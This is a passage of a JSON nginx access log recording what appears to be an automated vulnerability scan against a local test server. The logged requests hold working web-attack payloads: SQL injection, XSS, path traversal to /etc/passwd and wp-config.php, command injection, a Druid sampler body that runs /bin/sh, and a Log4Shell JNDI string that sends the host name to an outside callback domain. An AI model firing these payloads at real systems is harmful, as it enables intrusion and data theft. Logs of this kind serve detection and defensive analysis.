HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cacti/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /userportal/webpages/myaccount/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/user/picker?query= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /goforms/rlminfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?post_type=post&s=%22%3E%3Cscript%3Ealert(/297MbGgijYp7UyLx8uuKmwM3olu/)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wsdl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.221","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /elocker_old/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /menu/stc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.227","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWebAdmin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc/groovyconsole.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.219","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x22&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authentication/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /userportal/Controller?mode=8700&operation=1&datagrid=179&json={\x22\xF0\x9F\xA6\x9E\x22:\x22test\x22} HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpunit.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.220","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?view=log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CMSPages/GetDocLink.ashx?link=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"new_login_session_management=1&languageChoice=1&authUser=admin&clearPass=pass&languageChoice=10","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x22&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"cat_id=4'&get_seleted_Category=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /homeaction.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /297MbMlXiyye8IWmy1ShZMaORkf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.226","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/options-general.php/%3C/script%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/?page=skatubazar_option HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zm/?view=log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lucee/admin/server.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.238","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/apple-app-site-association HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /startup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.239","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /heapdump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /database/schema.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.236","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"{\x0D\x0A\x22type\x22:\x22index\x22,\x0D\x0A\x22spec\x22:{\x0D\x0A \x22ioConfig\x22:{\x0D\x0A \x22type\x22:\x22index\x22,\x0D\x0A \x22firehose\x22:{\x0D\x0A \x22type\x22:\x22local\x22,\x0D\x0A \x22baseDir\x22:\x22/etc\x22,\x0D\x0A \x22filter\x22:\x22passwd\x22\x0D\x0A }\x0D\x0A },\x0D\x0A \x22dataSchema\x22:{\x0D\x0A \x22dataSource\x22:\x22odgjxrrrePz\x22,\x0D\x0A \x22parser\x22:{\x0D\x0A \x22parseSpec\x22:{\x0D\x0A \x22format\x22:\x22javascript\x22,\x0D\x0A \x22timestampSpec\x22:{\x0D\x0A\x0D\x0A },\x0D\x0A \x22dimensionsSpec\x22:{\x0D\x0A\x0D\x0A },\x0D\x0A \x22function\x22:\x22function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\x5C\x22/bin/sh`@~-c`@~cat /etc/passwd\x5C\x22.split(\x5C\x22`@~\x5C\x22)).getInputStream()).useDelimiter(\x5C\x22\x5C\x5CA\x5C\x22).next();return {timestamp:\x5C\x224137368\x5C\x22,OQtGXcxBVQVL: hTVCCerYZ}}\x22,\x0D\x0A \x22\x22:{\x0D\x0A \x22enabled\x22:\x22true\x22\x0D\x0A }\x0D\x0A }\x0D\x0A }\x0D\x0A }\x0D\x0A},\x0D\x0A\x22samplerConfig\x22:{\x0D\x0A \x22numRows\x22:10\x0D\x0A}\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /druid/indexer/v1/sampler HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.238","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.239","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.075","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"${jndi:${lower:d}n${lower:s}://${env:hostName}.c9v8hs0smpv8c6ag07h0n9gb4hxddadeg.oast.online}"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/diarise/download.php?calendar=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.082","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA